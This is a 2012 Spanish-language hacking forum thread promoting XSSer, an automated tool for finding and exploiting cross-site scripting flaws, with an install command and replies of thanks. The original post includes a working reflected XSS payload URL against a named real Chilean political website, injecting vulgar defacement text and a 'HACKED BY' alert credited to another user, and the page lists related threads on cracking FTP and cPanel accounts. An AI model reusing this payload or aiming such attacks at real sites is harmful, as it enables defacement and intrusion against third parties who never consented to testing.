Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSSer: automatic tool for pentesting XSS attacks

  • 2 Respuestas
  • 2399 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado xc0d3

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
  • root@xc0d3[#] ~Done
    • Ver Perfil
    • Email
« en: Junio 01, 2012, 11:20:48 am »

XSSer es una  herramienta de prueba  que automatiza el proceso de detección y explotación de inyecciones XSS contra diferentes aplicaciones.

XSS Es un tipo de inseguridad informática típico de las aplicaciones Web,
que permite a una tercera parte inyectar código JavaScript en páginas web vistas por el usuario.

Instalacion

apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip en bt ya esta instalada





EJEMPLO

xss descubierto por mi amigo Crackx

http://www.senadorvirtual.cl/dgeneral.php?ideleg&idusuario=%22%3E%3Ch1%3EFUCK+POLITICOS+KULIAOS+0wn3d+Team%3C%2Fh1%3E%3Cscript%3Ealert%28%22HACKED+BY+Crackx+FUCK+POLITICOS%22%29%3C%2Fscript%3E


mas Info ->http://xsser.sourceforge.net/

 
« Última modificación: Junio 01, 2012, 01:02:59 pm por Pr0ph3t »
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás”

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 555
  • Actividad:
    0%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #1 en: Junio 01, 2012, 11:52:59 am »
Gracias por el programa el otra ves lo mire ahora vere como usarlo ;) :D
Pentest - Hacking & Security Services

Contact me: arthusu@gmail.com

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« Respuesta #2 en: Junio 25, 2012, 04:47:49 am »
Gracias por tu aporte.

 

¿Te gustó el post? COMPARTILO!



Security Labs - Online PenTesting Tools [Priv8]

Iniciado por CalebBucker

Respuestas: 6
Vistas: 4064
Último mensaje Septiembre 07, 2012, 05:35:58 pm
por ruben_linux
Cubriendo el Pentesting Web Cap 1 Sql Injections

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2026
Último mensaje Febrero 24, 2010, 03:19:24 pm
por dracko.rx
Tool para sacar Todos! los archivos de configuracion de un servidor

Iniciado por ANTRAX

Respuestas: 3
Vistas: 3155
Último mensaje Agosto 30, 2012, 01:28:32 pm
por hdbreaker
Tool para crackear server FTP by Guason

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2117
Último mensaje Febrero 24, 2010, 03:10:51 pm
por dracko.rx
Craking(Diccionario) cuentas de Cpanel - Tool(php)

Iniciado por andrewtwo

Respuestas: 0
Vistas: 1949
Último mensaje Septiembre 10, 2012, 02:49:03 am
por andrewtwo